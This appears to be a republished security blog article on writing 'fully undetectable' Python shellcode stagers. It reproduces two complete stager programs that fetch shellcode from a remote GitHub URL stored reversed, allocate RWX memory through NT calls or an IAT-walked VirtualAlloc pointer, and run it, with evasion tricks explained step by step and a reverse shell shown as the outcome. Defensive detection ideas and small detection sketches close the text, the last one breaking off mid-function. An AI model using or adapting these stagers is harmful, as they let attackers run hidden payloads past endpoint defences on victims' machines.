FUD Shellcode Stagers in Python: String Reversal, NT APIs and IAT Walking to Bypass EDR

Original text: “Creative approaches to coding FUD Stagers” by R.B.C. (g3tsyst3m), G3tSyst3m’s Infosec Blog (March 29, 2026). The code, screenshots and VirusTotal results below are reproduced verbatim with attribution captions; the surrounding prose is a paraphrase.

Executive Summary

The g3tsyst3m blog post walks through two Python-based shellcode stagers that both achieve 0/63 on VirusTotal by attacking the weakest point in modern endpoint defence: static analysis. Variant 1 is a 135-line dropper that downloads a remote payload, reverses suspicious API strings (NtAllocateVirtualMemory, NtCreateThreadEx, memmove) so they never appear as plaintext tokens, allocates RWX memory through the NT-layer instead of kernel32, and spawns a thread to detonate the shellcode — no disk writes, no PE loader involvement, no obviously malicious imports. Variant 2 raises the bar: it skips VirtualAlloc entirely as a named symbol and instead parses the on-disk copy of pythonXY.dll with pefile, walks the Import Address Table looking for the reversed needle collAlautriV, computes the runtime IAT slot from base + RVA − ImageBase, dereferences it to read the live VirtualAlloc pointer the Windows loader wrote there at startup, and casts that pointer to a callable through ctypes.WINFUNCTYPE.

For defenders the takeaway is not the obfuscation tricks themselves (reversed strings unwind in a sandbox in milliseconds) but the choice of carrier. Python interpreters are an unusual and rarely monitored execution surface: legitimate Python rarely allocates RWX, rarely calls NtCreateThreadEx, and never walks the IAT of its own runtime DLL. The article ends with ten dynamic-analysis detection ideas that operate at exactly those behavioural seams, from ETW Microsoft-Windows-Threat-Intelligence ALLOCVM events out of interpreter processes to memory scanning of executable private pages after the decode happens. This post reproduces both stagers in full and unpacks each evasion mechanism phase by phase.

Why script interpreters as a carrier

There is no silver bullet for EDR bypass — the author opens with that observation, and with ML-assisted scoring now wired into most modern endpoint products the surface keeps shifting. What does work, repeatedly, is picking a host process that the defender’s telemetry treats as benign. Script interpreters — Python, Ruby, Perl, even PHP — sit in that sweet spot: they execute arbitrary user code but their on-disk artifacts (a .py file, a portable python.exe) are scrutinised far less aggressively than a compiled PE. PowerShell occupies the opposite extreme; threat actors have abused it so thoroughly that staying FUD inside powershell.exe is “incredibly difficult—but certainly not impossible.”

FUD Stager Variant #1

High-level overview

  1. Build the staging URL by reversing a string (SCODE_U[::-1]) so the destination never appears in cleartext.
  2. Download the raw shellcode bytes into memory over HTTPS.
  3. Allocate RWX memory through NtAllocateVirtualMemory — the NT-layer call, not the kernel32 wrapper — to slip past API hooks that monitor only the upper layer.
  4. Copy the bytes in with memmove.
  5. Detonate via NtCreateThreadEx with the new region as the start address.
  6. Every suspicious API name (_api, _api2, …) is stored reversed and resolved with getattr(ntdll, name[::-1]) at runtime.

The net effect is a 135-line in-memory dropper that never touches disk after the initial .py.

Part 1 — Bypassing static analysis

The first defensive layer to climb is not a behavioural sensor; it is the static scoring model. Two tricks do most of the work: rename or shorten any obvious offsec term (shellcode → scode, download_shellcode → dwnlod_scode), and store every flagged API name reversed so it gets unwound at runtime.

Two illustrative reversals:

_api    = "yromeMlautriVetacollAtN"   # NtAllocateVirtualMemory reversed
SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"

Why string detection matters

Whether the engine is signature-based or model-based, almost every static layer ends up doing some form of token scoring. Strings like VirtualAlloc, CreateThread, NtAllocateVirtualMemory, and shellcode carry heavy malicious weight in any pretrained classifier. The goal is not invisibility but threshold management: stay under the score that triggers a block or a quarantine. Reversing the API strings and resolving them at runtime is, as the author puts it, “about as low-effort as obfuscation gets” — and it works precisely because a static engine, by definition, cannot execute your code to unwind the reversal.
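The same property cuts both ways: a scanner that knows to reverse string literals sees the names statically after all. The sketch below is not from the original article. It assumes a hypothetical watchlist (WATCHLIST) and an illustrative helper name (find_reversed_names), and uses Python's standard ast module to pull string and bytes literals out of a script and test each one in reverse.

```python
import ast

# Hypothetical watchlist; a real deployment would carry a much longer one.
WATCHLIST = {
    "NtAllocateVirtualMemory",
    "NtCreateThreadEx",
    "VirtualAlloc",
    "WaitForSingleObject",
    "CloseHandle",
    "memmove",
}

def find_reversed_names(source: str) -> list[tuple[int, str]]:
    """Return (line, api_name) for each literal that matches the watchlist when reversed."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, (str, bytes)):
            value = node.value
            text = value.decode("latin-1") if isinstance(value, bytes) else value
            if text[::-1] in WATCHLIST:
                hits.append((node.lineno, text[::-1]))
    return sorted(hits)

# Literals taken from the article's listings, plus one harmless string.
sample = '''
_api = "yromeMlautriVetacollAtN"
_api2 = "xEdaerhTetaerCtN"
memprep = b"collAlautriV"
greeting = "hello"
'''

for line, name in find_reversed_names(sample):
    print(f"line {line}: reversed literal resolves to {name}")
```

This only covers plain reversal; it is meant to show why the article treats the trick as threshold management against today's scoring models and not as durable concealment.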

Variable names matter

Equally simple, equally effective: rename your variables, functions and even comments away from the giveaway tokens. download_shellcode is a gift to any analyst or scanner; dwnlod_scode won’t fool a human for long, but human reviewers are not the audience — the pre-execution scoring pass is. The point is to nudge the file’s aggregate token score below the disposition threshold.

Part 2 — Downloading the shellcode into memory

The shellcode lives in a public GitHub repo. The URL is stored reversed (SCODE_U) and unwound at runtime. To keep the hosted file itself off the obvious-extension radar, the author renames it to .dyno, an extension Windows does not associate with anything and which receives less scrutiny than .bin would.

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)  # Stream for large files
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))  # Load fully into bytes
        print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
        return shel_ly
    except Exception as e:
        print(f"[-] Dwnld failed: {e}")
        return None

The function streams the response and returns the raw bytes as shel_ly. No open(), no write(), no on-disk artifact — the payload lives only as a Python bytes object until execution.
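Seen from the network side, the download is ordinary HTTPS, but requests announces itself with a default User-Agent of the form python-requests/<version> unless the caller overrides it, and the function above does not. Where TLS inspection exposes request headers, that gives a simple triage rule. The sketch below assumes a hypothetical proxy-log record shape (a dict with host and user_agent keys) and an illustrative host list; neither comes from the original article.

```python
import re

# Default User-Agent format used by the requests library.
UA_PATTERN = re.compile(r"^python-requests/\d+(\.\d+)*$")

# Illustrative list of raw-file hosts; the article's URL points at the first one.
RAW_FILE_HOSTS = {"raw.githubusercontent.com"}

def is_suspicious(record: dict) -> bool:
    """Flag a proxy-log record: default requests User-Agent talking to a raw-file host."""
    return bool(UA_PATTERN.match(record["user_agent"])) and record["host"] in RAW_FILE_HOSTS

# Hypothetical log records for illustration.
records = [
    {"host": "raw.githubusercontent.com", "user_agent": "python-requests/2.31.0"},
    {"host": "pypi.org", "user_agent": "python-requests/2.31.0"},
    {"host": "raw.githubusercontent.com", "user_agent": "Mozilla/5.0"},
]

for rec in records:
    print(rec["host"], rec["user_agent"], "->", is_suspicious(rec))
```

On its own this rule is noisy, since plenty of legitimate tooling fetches raw files with requests; it is most useful as one input to a correlation with what the process does next.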

Part 3 — Eggsecuting shellcode in memory 🥚

The author keeps the execution path deliberately plain (no direct syscalls, no advanced injection trick) to see how far minimal obfuscation alone can carry the sample. The single concession to evasion is calling the NT layer in ntdll instead of the kernel32 wrappers, which sidesteps user-mode hooks placed only on the kernel32 exports.

Obfuscated Windows API calls

"eldnaHesolC"[::-1]              -> CloseHandle
"tcejbOelgniSroFtiaW"[::-1]      -> WaitForSingleObject
"yromeMlautriVetacollAtN"[::-1]  -> NtAllocateVirtualMemory
"xEdaerhTetaerCtN"[::-1]         -> NtCreateThreadEx
"evommem"[::-1]                  -> memmove

Allocating executable memory through the NT API

NtAllocateVirtualMemory (the lower-level cousin of VirtualAlloc exported from ntdll) requests a region in the current process with the classic offensive triple: MEM_COMMIT | MEM_RESERVE for the allocation type and PAGE_EXECUTE_READWRITE for the protection. Textbook RWX.
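The flag arithmetic behind that triple is small enough to check by hand, and it is the same decoding a defender applies to allocation telemetry. The sketch below is illustrative only: describe_allocation is a hypothetical helper, while the constants are the documented Win32 values.

```python
# Documented Win32 constants.
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_EXECUTE_READWRITE = 0x40

def describe_allocation(alloc_type: int, protect: int) -> dict:
    """Decode the two flag words an allocation event would carry (hypothetical helper)."""
    return {
        "commit": bool(alloc_type & MEM_COMMIT),
        "reserve": bool(alloc_type & MEM_RESERVE),
        # The low byte holds the base protection; modifiers such as
        # PAGE_GUARD (0x100) sit in the higher bits.
        "rwx": (protect & 0xFF) == PAGE_EXECUTE_READWRITE,
    }

event = describe_allocation(MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)
print(hex(MEM_COMMIT | MEM_RESERVE), event)
```

A commit-and-reserve request that asks for 0x40 in one call is exactly the pattern the article's first defensive recommendation keys on.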

Copy and execute

memmove (also resolved by string reversal) blits the downloaded bytes into the freshly allocated RWX region. Then NtCreateThreadEx spawns a thread inside the current process with the start address pointed at the beginning of the shellcode. WaitForSingleObject blocks for up to ten seconds for the thread to finish, then CloseHandle tidies up.

def eggsecute_scode(scode2):
    # Constants
    MEM_COMMIT = 0x1000
    MEM_RESERVE = 0x2000
    PAGE_EXECUTE_READWRITE = 0x40

    kernel32 = ctypes.windll.kernel32
    ntdll = ctypes.windll.ntdll

    _api4 = "eldnaHesolC"
    closingtime = getattr(kernel32, _api4[::-1])

    closingtime.restype = wintypes.DWORD
    closingtime.argtypes = [
    wintypes.HANDLE,  # hHandle
    ]

    _api3 = "tcejbOelgniSroFtiaW"
    waitinaround = getattr(kernel32, _api3[::-1])

    waitinaround.restype = wintypes.DWORD
    waitinaround.argtypes = [
    wintypes.HANDLE,  # hHandle
    wintypes.DWORD,   # dwMilliseconds
    ]

    _api = "yromeMlautriVetacollAtN"  #
    Allocator = getattr(ntdll, _api[::-1])

    Allocator.restype = wintypes.BOOL
    Allocator.argtypes = [
    wintypes.HANDLE,
    ctypes.POINTER(wintypes.LPVOID),
    ctypes.c_void_p,
    ctypes.POINTER(ctypes.c_size_t),
    wintypes.DWORD,
    wintypes.DWORD,
    ]

    _api2 = "xEdaerhTetaerCtN"
    thred_the_needle = getattr(ntdll, _api2[::-1])

    thred_the_needle.restype = wintypes.LONG  # NTSTATUS
    thred_the_needle.argtypes = [
    ctypes.POINTER(wintypes.HANDLE),   # ThredHandel (out)
    ctypes.c_ulong,                    # DesiredAccess
    ctypes.c_void_p,                   # ObjectAttributes
    wintypes.HANDLE,                   # ProcessHandle
    ctypes.c_void_p,                   # StartRoutine (your scode addr)
    ctypes.c_void_p,                   # Argument
    ctypes.c_ulong,                    # CrateFlags (0 = run immediately)
    ctypes.c_size_t,                   # ZeroBits
    ctypes.c_size_t,                   # StackSize
    ctypes.c_size_t,                   # MaximumStackSize
    ctypes.c_void_p,                   # AttributeList
]

    addr = wintypes.LPVOID(0)
    size = ctypes.c_size_t(len(scode2))
    current_process = wintypes.HANDLE(-1)
    status = Allocator(
        current_process,
        ctypes.byref(addr),
        0,
        ctypes.byref(size),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE
    )

    if status == 0:  # NTSTATUS 0 = success
        mem_addr = addr.value
        print(f"[+] Allcted mem at: 0x{mem_addr:x}")

        _api0 = "evommem"
        m3mMov3r = getattr(ctypes, _api0[::-1])

        m3mMov3r(mem_addr, scode2, len(scode2))
        print("[+] Scode copied to memory")

        h_thread = wintypes.HANDLE(0)
        status2 = thred_the_needle(
        ctypes.byref(h_thread),
        0x1FFFFF,                          # THRED_ALL_ACCESS
        None,
        current_process,
        ctypes.cast(mem_addr, ctypes.c_void_p),  # scode start address
        None,
        0,                                 # no flags, start immediately
        0,
        0,
        0,
        None
        )

        if status2 == 0:
            print(f"[+] Thredded Needle!")

            waitinaround(h_thread.value, 10000)
            closingtime(h_thread.value)
        else:
            print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")

    else:
        print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")

Bringing it all together

One hundred and thirty-five lines of Python, and an effective in-memory shellcode runner with no disk write. At submission time the sample scored 0/63 on VirusTotal — FUD achieved.

[Figure] Variant #1 console output: download → NtAllocateVirtualMemory → memmove → NtCreateThreadEx. Source: original article.
[Figure] Reverse shell received after the Variant #1 stager finishes detonating in-memory. Source: original article.
[Figure] VirusTotal verdict for Variant #1: 0/63. Source: original article.

Full source — Variant #1

#27e51de6e6a555bc622a3769ee030bfd92079022780ca8bb33958479562dfc6e

import requests
import ctypes
from ctypes import wintypes

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]
def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)  # Stream for large files
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))  # Load fully into bytes
        print(f"[+] Dwnlded {len(shel_ly)} bytes of scode")
        print(shel_ly)
        return shel_ly
    except Exception as e:
        print(f"[-] Dwnld failed: {e}")
        return None

def eggsecute_scode(scode2):
    # Constants
    MEM_COMMIT = 0x1000
    MEM_RESERVE = 0x2000
    PAGE_EXECUTE_READWRITE = 0x40

    kernel32 = ctypes.windll.kernel32
    ntdll = ctypes.windll.ntdll

    _api4 = "eldnaHesolC"
    closingtime = getattr(kernel32, _api4[::-1])

    closingtime.restype = wintypes.DWORD
    closingtime.argtypes = [
    wintypes.HANDLE,  # hHandle
    ]

    _api3 = "tcejbOelgniSroFtiaW"
    waitinaround = getattr(kernel32, _api3[::-1])

    waitinaround.restype = wintypes.DWORD
    waitinaround.argtypes = [
    wintypes.HANDLE,  # hHandle
    wintypes.DWORD,   # dwMilliseconds
    ]

    _api = "yromeMlautriVetacollAtN"  #
    Allocator = getattr(ntdll, _api[::-1])

    Allocator.restype = wintypes.BOOL
    Allocator.argtypes = [
    wintypes.HANDLE,
    ctypes.POINTER(wintypes.LPVOID),
    ctypes.c_void_p,
    ctypes.POINTER(ctypes.c_size_t),
    wintypes.DWORD,
    wintypes.DWORD,
    ]

    _api2 = "xEdaerhTetaerCtN"
    thred_the_needle = getattr(ntdll, _api2[::-1])

    thred_the_needle.restype = wintypes.LONG  # NTSTATUS
    thred_the_needle.argtypes = [
    ctypes.POINTER(wintypes.HANDLE),   # ThredHandel (out)
    ctypes.c_ulong,                    # DesiredAccess
    ctypes.c_void_p,                   # ObjectAttributes
    wintypes.HANDLE,                   # ProcessHandle
    ctypes.c_void_p,                   # StartRoutine (your scode addr)
    ctypes.c_void_p,                   # Argument
    ctypes.c_ulong,                    # CrateFlags (0 = run immediately)
    ctypes.c_size_t,                   # ZeroBits
    ctypes.c_size_t,                   # StackSize
    ctypes.c_size_t,                   # MaximumStackSize
    ctypes.c_void_p,                   # AttributeList
]

    addr = wintypes.LPVOID(0)
    size = ctypes.c_size_t(len(scode2))
    current_process = wintypes.HANDLE(-1)
    status = Allocator(
        current_process,
        ctypes.byref(addr),
        0,
        ctypes.byref(size),
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE
    )

    if status == 0:  # NTSTATUS 0 = success
        mem_addr = addr.value
        print(f"[+] Allcted mem at: 0x{mem_addr:x}")

        _api0 = "evommem"
        m3mMov3r = getattr(ctypes, _api0[::-1])

        m3mMov3r(mem_addr, scode2, len(scode2))
        print("[+] Scode copied to memory")

        h_thread = wintypes.HANDLE(0)
        status2 = thred_the_needle(
        ctypes.byref(h_thread),
        0x1FFFFF,                          # THRED_ALL_ACCESS
        None,
        current_process,
        ctypes.cast(mem_addr, ctypes.c_void_p),  # scode start address
        None,
        0,                                 # no flags, start immediately
        0,
        0,
        0,
        None
        )

        if status2 == 0:
            print(f"[+] Thredded Needle!")

            waitinaround(h_thread.value, 10000)
            closingtime(h_thread.value)
        else:
            print(f"[-] thred_the_needle failed: {hex(status2 & 0xFFFFFFFF)}")

    else:
        print(f"[-] Allocator failed (NTSTATUS: 0x{status:08X})")

if __name__ == "__main__":
    print("[*] Dwnlding scode from URL...")
    scode = dwnlod_scode(SCODE_U)
    if scode:
        print("[*] Eggsecuting Scode in mem...")
        eggsecute_scode(scode)
    else:
        print("[-] Aborting.")

FUD Stager Variant #2

High-level overview

Variant #2 removes VirtualAlloc from the static surface entirely. Instead of looking the symbol up (via GetProcAddress or even via reversed-string indirection through ctypes), it borrows what the Python interpreter has already loaded: the kernel32 import resolved into pythonXY.dll’s IAT. The runtime address of VirtualAlloc is already sitting in memory the moment Python is running; you just have to walk to it. The approach assumes a portable Python, so that the on-disk pythonXY.dll sits next to the interpreter executable and is available for PE parsing.

The resolved IAT pointer becomes a typed function pointer (ctypes.WINFUNCTYPE), giving the stager direct callable access to VirtualAlloc without ever naming the symbol explicitly. No direct API call. No obvious import. No GetProcAddress. Static analysis loses another anchor.

[Figure] Variant #2 preview: python314.dll base address, IAT-resolved VirtualAlloc pointer, RWX page allocated. Source: original article.
[Figure] Variant #2 preview: copy_to_page copies the downloaded bytes and exec_page invokes the cast function pointer. Source: original article.

Part 1 — The familiar downloader

The opening is intentionally identical to Variant #1 — the URL is stored reversed, the variable is renamed to SCODE_U, the download path drops the bytes into a Python bytes object. New here is the conditional pefile import.

import ctypes, sys, os
import requests

try:
    import pefile
except ImportError:
    print("pip install pefile"); sys.exit(1)

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]

def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))
        print(f"[+] Downloaded {len(shel_ly)} bytes")
        return shel_ly
    except Exception as e:
        print(f"[-] Download failed: {e}"); return None

Part 2 — Copy/exec helpers

Two short helpers: copy_to_page uses ctypes.memmove to blit the shellcode into the RWX region, and exec_page casts that page address to a void(*)(void) through ctypes.WINFUNCTYPE(None) and calls it. Note ctypes accepts a Python bytes object directly as the src argument to memmove, which keeps the call site clean.

def copy_to_page(page: int, scode: bytes) -> bool:
    """Copy scode bytes into the RWX page via ctypes.memmove."""
    if not page:
        print("[-] Invalid page address"); return False
    if len(scode) > 0x1000:
        print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False

    # memmove(dst, src, count)
    # dst = raw integer address of our RWX page
    # src = scode bytes (ctypes accepts bytes directly as src)
    ctypes.memmove(page, scode, len(scode))
    print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
    return True

def exec_page(page: int):
    """Cast the page to a void(*)(void) and call it."""
    thunk = ctypes.WINFUNCTYPE(None)(page)
    print(f"[+] Executing scode @ 0x{page:016x}")
    thunk()

Part 3 — Walking the IAT to locate VirtualAlloc

Phase 1 — build the DLL name and path dynamically

Compose pythonXY.dll from sys.version_info at runtime — python313.dll, python314.dll, whatever the interpreter happens to be. The on-disk dll_path is what pefile will read to parse section headers, the import directory, and ImageBase. The same code works across every Python minor release with no edits.

ver      = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)

Phase 2 — live in-memory base address

GetModuleHandleW returns the base address of the already-loaded module — no new mapping, no disk read. Python is running, so pythonXY.dll is resident. The explicit restype = c_void_p is important: without it ctypes would truncate the 64-bit address to a signed 32-bit int.

k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype  = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)
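The truncation that the restype note warns about can be reproduced without calling any Windows API, because ctypes integer types do no overflow checking. The address below is a made-up value chosen so that its low 32 bits have the top bit set; it is an assumption for illustration, not a real module base.

```python
import ctypes

# Hypothetical 64-bit module base (illustrative value only).
fake_base = 0x7FFB92340000

# Foreign functions return c_int by default, which keeps only the low 32 bits
# and interprets them as signed.
as_default_int = ctypes.c_int(fake_base).value

# With restype = c_void_p the full pointer-sized value survives on 64-bit Python.
as_void_p = ctypes.c_void_p(fake_base).value

print(f"original -> {fake_base:#x}")
print(f"c_int    -> {as_default_int:#x}")
print(f"c_void_p -> {as_void_p:#x}")
```

Any later arithmetic on the truncated value would point somewhere unrelated, which is why the pointer-sized return type has to be declared before the call.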

Phase 3 — parse the on-disk PE

Read the same DLL from disk just for its layout: section headers, import directory offsets, ImageBase. With fast_load=False, pefile parses the data directories, including the import table, while constructing the object; the explicit parse_data_directories() call that follows is a belt-and-braces repeat of that step.

pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()

Phase 4 — walk the IAT, resolve the live pointer

Filter to kernel32.dll imports only and match against b"VirtualAlloc" — which never appears in plaintext because the bytestring b"collAlautriV" is reversed at compare time. For the match, imp.address is the on-disk VA of the IAT slot; subtracting pe.OPTIONAL_HEADER.ImageBase converts it to an RVA; adding the live base converts the RVA into the actual runtime address of the slot. c_uint64.from_address(slot).value dereferences the eight-byte pointer the Windows loader wrote there at startup. The result va_va is the live, post-ASLR, post-loader-resolution runtime address of VirtualAlloc, ready to be cast to a callable.

memprep = b"collAlautriV"   # "VirtualAlloc" reversed
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    if b'kernel32' in entry.dll.lower():
        for imp in entry.imports:
            if imp.name == memprep[::-1]:
                slot  = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
                va_va = ctypes.c_uint64.from_address(slot).value
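The address arithmetic in that loop is ordinary PE rebasing and can be checked with made-up numbers. In the sketch below every value is hypothetical (the preferred ImageBase, the IAT slot VA, and the ASLR-chosen load base), and rebase is an illustrative helper name, not part of pefile.

```python
def rebase(on_disk_va: int, image_base: int, live_base: int) -> int:
    """Translate a VA computed against the preferred ImageBase into the loaded module."""
    rva = on_disk_va - image_base   # offset from the start of the image
    return live_base + rva          # same offset, applied where the loader mapped it

# Hypothetical values for illustration only.
IMAGE_BASE = 0x180000000       # preferred base recorded in the optional header
SLOT_VA = 0x1803A2150          # IAT slot VA as a PE parser would report it
LIVE_BASE = 0x7FFB12340000     # base the loader actually chose under ASLR

slot = rebase(SLOT_VA, IMAGE_BASE, LIVE_BASE)
print(f"RVA  = {SLOT_VA - IMAGE_BASE:#x}")
print(f"slot = {slot:#x}")
```

The result is only the location of the slot; the pointer stored in it is whatever the loader resolved at startup, which is why the listing reads the slot's contents as a separate step.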

Part 4 — cast and execute

ctypes.WINFUNCTYPE turns the raw va_va integer into a typed callable whose signature mirrors VirtualAlloc: it returns void* and takes void*, SIZE_T, DWORD, DWORD. Calling it with NULL, 0x1000, MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40) returns a fresh RWX page, with no forward-spelled reference to the function name anywhere in the script's source.

MemoryAllocator = ctypes.WINFUNCTYPE(
    ctypes.c_void_p,
    ctypes.c_void_p, ctypes.c_size_t,
    ctypes.c_uint32, ctypes.c_uint32
)(va_va) # <--here's where we cast it

page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")

if page:
    print("[+] allocated!")

Then the familiar finale: download the shellcode, copy it into the page, jump to it. The cleanup block (VirtualFree with MEM_RELEASE = 0x8000) only runs if the shellcode returns — which most reverse-shell payloads don’t.

# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
    # page = your VAlloc result from earlier
    if copy_to_page(page, scode):
        exec_page(page)

    # ── cleanup (only reached if shellcode returns) ───────────────────────────────
    k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
    print("[*] freed")

VirusTotal results 💊

Hash: 6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6

[Figure] VirusTotal verdict for Variant #2: 0/63. Source: original article.

Full source — Variant #2

#6c2a91f23724a8605312bff1d629f92a7a88e78d947e79da5e403338f4eefeb6

import ctypes, sys, os
import requests

try:
    import pefile
except ImportError:
    print("pip install pefile"); sys.exit(1)

SCODE_U = "onyd.ger/niam/sdaeh/sfer/radarehtrednu/m3tsyst3g/moc.tnetnocresubuhtig.war//:sptth"
SCODE_U = SCODE_U[::-1]

def dwnlod_scode(url):
    try:
        response = requests.get(url, stream=True)
        response.raise_for_status()
        shel_ly = b''.join(response.iter_content(chunk_size=4096))
        print(f"[+] Downloaded {len(shel_ly)} bytes")
        return shel_ly
    except Exception as e:
        print(f"[-] Download failed: {e}"); return None

def copy_to_page(page: int, scode: bytes) -> bool:
    """Copy scode bytes into the RWX page via ctypes.memmove."""
    if not page:
        print("[-] Invalid page address"); return False
    if len(scode) > 0x1000:
        print(f"[-] Scode too large ({len(scode)} > 0x1000)"); return False

    # memmove(dst, src, count)
    # dst = raw integer address of our RWX page
    # src = scode bytes (ctypes accepts bytes directly as src)
    ctypes.memmove(page, scode, len(scode))
    print(f"[+] Copied {len(scode)} bytes → 0x{page:016x}")
    return True

def exec_page(page: int):
    """Cast the page to a void(*)(void) and call it."""
    thunk = ctypes.WINFUNCTYPE(None)(page)
    print(f"[+] Executing scode @ 0x{page:016x}")
    thunk()

ver      = sys.version_info
dll_name = f"python{ver.major}{ver.minor}.dll"
dll_path = os.path.join(os.path.dirname(sys.executable), dll_name)

k32 = ctypes.windll.kernel32
k32.GetModuleHandleW.restype  = ctypes.c_void_p
k32.GetModuleHandleW.argtypes = [ctypes.c_wchar_p]
base = k32.GetModuleHandleW(dll_name)
print(f"[*] {dll_name} @ 0x{base:016x}")

pe = pefile.PE(dll_path, fast_load=False)
pe.parse_data_directories()

memprep=b"collAlautriV"
va_va = 0
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    if b'kernel32' in entry.dll.lower():
        for imp in entry.imports:
            if imp.name == memprep[::-1]:
                slot  = base + imp.address - pe.OPTIONAL_HEADER.ImageBase
                va_va = ctypes.c_uint64.from_address(slot).value
                break

if not va_va:
    print("[-] collAlautriV not found in IAT"); sys.exit(1)
print(f"[+] collAlautriV @ 0x{va_va:016x}")

MemoryAllocator = ctypes.WINFUNCTYPE(
    ctypes.c_void_p,
    ctypes.c_void_p, ctypes.c_size_t,
    ctypes.c_uint32, ctypes.c_uint32
)(va_va)

page = MemoryAllocator(None, 0x1000, 0x3000, 0x40)
print(f"[+] RWX page @ 0x{page:016x}" if page else f"[-] failed (GLE={k32.GetLastError()})")

if page:
    print("[+] allocated!")

# ── execution ─────────────────────────────────────────────────────────────────────
scode = dwnlod_scode(SCODE_U)
if scode:
    # page = your VAlloc result from earlier
    if copy_to_page(page, scode):
        exec_page(page)

    # ── cleanup (only reached if shellcode returns) ───────────────────────────────
    k32.VirtualFree(ctypes.c_void_p(page), 0, 0x8000)
    print("[*] freed")

Key Takeaways

  • String reversal beats token scoring. "yromeMlautriVetacollAtN"[::-1] is a one-line trick that erases the most heavily-weighted feature from a static classifier’s view. Same logic for variable names.
  • Carrier choice matters more than the obfuscation. A Python interpreter is an unusual but legitimate process; a malicious PE is not. Both stagers achieve 0/63 on VirusTotal largely because the file under analysis is a .py, not an EXE.
  • NT-layer APIs slip past hooks placed only on the wrappers. Products that instrument just the kernel32 exports miss calls made straight to the ntdll entry points; products that hook ntdll itself still see them. Either way the change costs nothing on the static side.
  • IAT walking removes the symbol from the surface entirely. If the host process has already loaded the function you want, the loader has already written its live address into the IAT — you just have to parse the PE, locate the slot, and dereference. No GetProcAddress, no import you control.
  • RWX in one shot is still legal in Win32. No VirtualProtect two-step needed; both stagers allocate executable-and-writable straight from the allocator. That’s a strong behavioural signal — cheap to detect dynamically, invisible statically.
  • 0/63 is a static metric, not a behavioural one. The author is explicit that dynamic detection of these stagers is straightforward; the entire technique lives in the pre-execution window.

Defensive Recommendations

The original article closes with ten dynamic-detection ideas. Restated here in deployment-friendly form:

  1. Alert on RWX allocations originating from python.exe (and other interpreter binaries). Legitimate Python workloads almost never request PAGE_EXECUTE_READWRITE.
  2. Consume the ETW Microsoft-Windows-Threat-Intelligence provider and alert on ALLOCVM events with execute permissions emitted by interpreter processes.
  3. Detect execution out of private, non-image-backed memory regions. Anything calling code from a private commit that isn’t mapped from a PE on disk is high signal.
  4. Correlate outbound network → allocation → execution within one process lifetime. The temporal chain is the giveaway, not any single event.
  5. Track python-requests User-Agent strings — especially talking to anonymous file hosts or raw-file CDNs.
  6. Flag NtAllocateVirtualMemory / NtCreateThreadEx originating from Python interpreters. Direct NT-layer use from a script interpreter is anomalous on its own.
  7. Sandbox-detonate unknown .py files with full API call tracing. Reversed strings unwind into plaintext in dynamic traces — what disappears statically is plainly visible at runtime.
  8. Alert on python.exe with no console / GUI parent making outbound connections. The execution context shape (orphan interpreter, network egress) is detectable.
  9. Detect pefile import activity at runtime. A running Python process parsing a PE is unusual outside of explicit RE / dev tooling.
  10. Scan execute-permission private regions periodically. Shellcode signatures that evade static scanning are often trivially detectable in-memory after decoding.
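Recommendation 4 can be sketched as a small correlation pass over process events. The event schema below (dicts with pid, image, kind and ts keys) and the kind labels are assumptions made for illustration; they do not correspond to any particular EDR or ETW schema, and find_chains is a hypothetical helper.

```python
from collections import defaultdict

INTERPRETERS = {"python.exe", "pythonw.exe"}
# Hypothetical event kinds, in the order the chain is expected to occur.
CHAIN = ("net_connect", "alloc_rwx", "thread_start_private")

def find_chains(events, window_s=60.0):
    """Return PIDs of interpreter processes that emit the full chain, in order, within window_s."""
    by_pid = defaultdict(list)
    for ev in events:
        if ev["image"].lower() in INTERPRETERS:
            by_pid[ev["pid"]].append(ev)

    flagged = []
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e["ts"])
        step, start = 0, None
        for ev in evs:
            if start is not None and ev["ts"] - start > window_s:
                step, start = 0, None      # window expired, start over
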